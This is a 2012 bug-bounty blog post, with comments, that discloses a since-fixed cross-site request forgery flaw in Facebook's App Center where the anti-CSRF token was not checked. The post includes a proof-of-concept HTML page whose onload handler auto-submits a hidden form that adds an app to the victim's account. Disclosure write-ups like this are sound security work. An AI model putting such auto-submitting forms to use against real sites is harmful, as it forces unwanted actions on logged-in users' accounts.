Sunday, 19 August 2012

Facebook CSRF worth USD 5000

This post is about a Cross-Site Request Forgery (CSRF) bug in Facebook I recently reported & now fixed. One fine day, when I logged into Facebook, I noticed a new feature "Appcenter". This feature allows you to choose apps you need. Game apps like Farmvilla are more popular.

I was previously working on apps, so decided to give a shot to this new feature. The game apps, when clicked "Play Game" button, was generating a POST request.


POST /connect/uiserver.php HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:13.0) Gecko/20100101 Firefox/13.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: <user_cookies>
Content-Type: application/x-www-form-urlencoded
Content-Length: 800


There are many new parameters added in this new feature. Parameter 'fb_dtsg' is like token and 'perm' are the permissions required by the apps. Parameters 'redirect_url','app_id' are app specific values. Remaining parameters seems static except 'new_perms' & 'orig_perms'. I started to play with these two dynamic params and after few attempts, I knew that these params no longer needed to add an app. 

Anti-CSRF tokens like 'fb_dtsg' supposed to get validated at server-side. I was shocked to see that in this new feature, somehow developer missed this point and it was possible to add app without 'fb_dtsg'. Bang!!

Final PoC for this CSRF looks like this:

<body onload=document.forms[0].submit();>
<form action="" method="POST">
        <input type="hidden" name="perms" value="" />
        <input type="hidden" name="dubstep" value=1 />
        <input type="hidden" name="new_user_session" value=1 />
        <input type="hidden" name="grant_clicked" value=1 />
        <input type="hidden" name="send_to_mobile_redirect_uri" value="" />
        <input type="hidden" name="app_id" value="2389801228" />
        <input type="hidden" name="redirect_uri" value="" />
        <input type="hidden" name="app_center" value=1 />
        <input type="hidden" name="is_paid_app" value="" />
        <input type="hidden" name="app_center_ref" value="appcenter" />
        <input type="hidden" name="response_type" value="none" />
        <input type="hidden" name="from_post" value=1 />
        <input type="hidden" name="__uiserv_method" value="permissions.request" />
        <input type="hidden" name="grant_clicked" value="Play+Game" />

This functionality was used for other apps as well such as music apps, developers apps. Facebook Security team awarded this bug with $5000.

Facebook was pretty fast to address this issue and resolved this the next day itself. I'm very thankful to Facebook Security Team.


  1. Anti-CSRF tokens like 'fb_dtsg' supposed to get validated at server-side. I was shocked to see that in this new feature, somehow developer missed this point and it was possible to add app without 'fb_dtsg'. Bang!!

    Awesome Find mate !!

  2. Congrats buddy.You are awesome as usual. :)

  3. Congrats bro. Awesome finding. :)

  4. Guy, you're genius because you TRIED it. I always believe that FB/Twitter are not that stupid to skip token verification. but now HAHAHA

    P.S. i love csrf

  5. +1 on Egors post. I would have thought "nah, if they check that token on five scripts, they check it on every script" :D
    Nice find and enjoy your additional months salary ;)

    Did you try to find an exploit by hand or use an automatic tool?

  6. Thansk everyone.
    @Egor, I think it was my lucky time. Btw, your work on CSRF is gr8
    @archi, mostly do it manually with FF adsons

  7. I was stunned to see that in this new function, somehow designer skipped this factor and it was possible to add app without 'fb_dtsg'.


  8. Well done, really impressive

    Keep the good work up !